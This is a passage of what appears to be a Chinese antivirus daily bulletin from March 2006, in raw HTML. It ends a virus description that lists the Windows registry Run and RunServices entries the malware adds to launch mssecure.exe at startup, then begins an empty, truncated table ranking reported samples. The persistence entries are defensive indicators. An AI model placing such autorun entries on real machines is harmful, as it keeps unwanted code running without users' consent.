82053字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;secures23&amp;quot; = mssecure.exe<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<br />&amp;quot;secures23&amp;quot; = mssecure.exe<br />这样，在Windows启动时，病毒就可以自动执行。<br /></div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div></span><div></div></td></tr></tbody></table><p><span>&amp;nbsp; <table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 562px" width="562" /></col /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 41px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width="562"><div><strong><font face="Arial">昨日病毒</font></strong></div></td></tr><tr style="MIN-HEIGHT: 31px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 146px" width="146" /></col /><col style="WIDTH: 149px" width="149" /></col /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="146"><div><font face="Arial"><strong>统计时段</strong></font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="149"><div><font face="宋体"><div title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><font size="2"><span id="L0238050004700606" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-17</span><span style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></span></font></div></font></div></td></tr></tbody></table></span><div></div></td></tr><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 555px" width="555" /></col /></colgroup><tbody><tr><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><div><strong><font face="Arial">病毒样本上报数排行</font></strong></div><div><strong><font face="Arial"></font></strong>&amp;nbsp;</div><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /></col /><col style="WIDTH: 165px" width="165" /></col /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 22px"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="229"><div align="center"><font face="Arial">样本文件名</font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="165"><div align="center"><font face="Arial">上报次数</font></div></td></tr></tbody></table></span><div></div></td></tr></tbody><tbody><tr id="L023806C006A80CC9"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /></col /><col style="WIDTH: 166px" width="166" /></col /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L0238074008E0140C" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-R